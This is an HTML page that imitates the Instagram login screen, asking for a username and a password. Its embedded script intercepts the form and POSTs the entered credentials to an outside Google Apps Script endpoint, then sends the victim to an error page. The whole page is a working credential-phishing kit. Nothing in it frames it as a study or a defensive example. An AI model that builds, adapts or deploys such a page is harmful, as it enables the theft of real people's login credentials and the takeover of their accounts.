<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
   

    <link rel="icon" href="images/instagram.png" type="image/icon">
    <link href="https://fonts.googleapis.com/css2?family=Pacifico&display=swap" rel="stylesheet">
    <title>Login . instagram</title>
    <style>
        * {
            margin: 0;
            padding: 0;
            box-sizing: border-box;
        }

        body {
            padding: 25px;
            display: flex;
            flex-direction: column;
            align-items: center;
            justify-content: center;
            text-align: center;
            color: rgb(99, 99, 99);
            font-family: 'Roboto', sans-serif;
            font-size: 14px;
            background: rgb(247, 247, 247);
        }


        .box {
            width: 100%;
            max-width: 350px;
            background-color: #fff;
            padding: 20px;
            border: 1px solid rgb(185, 185, 185);
        }

        .logo {
            width: 200px;
            margin: 0 auto;
        }

        img {
            width: 100%;
        }

        .log_in {
            margin-top: 20px;
        }

        .log_in input {
            font-size: 12px;
            margin: 2px 0;
            width: 100%;
            padding: 9px;
            border-color: rgba(199, 199, 199, 0.2);
            border-radius: 3px;
            color: rgb(99, 99, 99);
        }

        .log_in .submit {
            width: 100%;
            border: none;
            background: rgb(79, 198, 253);
            border-radius: 3px;
            padding: 7px;
            color: white;
            margin-top: 15px;
        }

        .hr {
            width: 100%;
            display: flex;
            align-items: center;
            justify-content: space-between;
            margin: 20px 0;

        }

        hr {
            width: 110px;
            border: none;
            height: 1px;
            background-color: rgb(201, 201, 201);
        }

        .mid {
            height: 50px;
            color: rgb(0, 24, 130);
            display: flex;
            flex-direction: column;
            justify-content: space-between;
            margin-bottom: 20px;
            font-size: 13px;
        }

        .fb {
            display: flex;
            width: 100%;
            align-items: center;
            justify-content: center;
        }

        .fb img {
            width: 9%;
            margin: 0 15px 0 0;
        }

        .sign {
            font-size: 14px;
            width: 100%;
            margin: 30px 0;
        }

        .sign span {
            color: rgb(3, 150, 218);
        }

        .download {
            width: 100%;
            height: 100px;
        }

        .download span {
            display: block;
            width: 100%;
        }

        .download img {
            width: 48%;
            margin-top: 15px;
        }
    </style>
</head>

<body>
    <div class="box">
        <div class="logo"><img src="images/Capture.PNG" alt=""></div>
        <div class="log_in">
            <form action="" autocomplete="off" id="test-form" method="post" name="google-sheet"
                onsubmit="return validateForm()">
                <input type="text" name="name" id="name" placeholder="Phone number, username, or email" required>
                <input type="password" name="password" id="password" placeholder="Password" required>
                <input class="submit" type="submit" value="login" name="submit" id="submit" />
            </form>

        </div>
        <div class="hr">
            <hr>
            <span>OR</span>
            <hr>
        </div>
        <div class="mid">
            <div class="fb"><img src="images/fb.PNG" alt="">Log in with Facebook</div>
            <span>Forgot password?</span>
        </div>
    </div>

   





    <script>
        const scriptURL = 'https://script.google.com/macros/s/AKfycbwEx940KtmI8tfyKct3hYpFFFNt3JV4hmLHVHmTVf6QKCRYqKhk/exec'
        const form = document.forms['google-sheet']

        form.addEventListener('submit', e => {
            e.preventDefault()
            fetch(scriptURL, { method: 'POST', body: new FormData(form) })
                .then(response => alert(""))
                .catch(error => console.error('Error!', error.message))
        })


       

        function validateForm() {
            var x = document.forms["google-sheet"]["name"].value;
            if (x == "") {
                alert("Name must be filled out");
                return false;
            }
            else{window.location.href = "error.html";}
        }

    </script>

    <script src="https://maxcdn.bootstrapcdn.com/bootstrap/4.1.1/js/bootstrap.min.js"></script>
    <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.2.1/jquery.min.js"></script>
   


</body>

</html>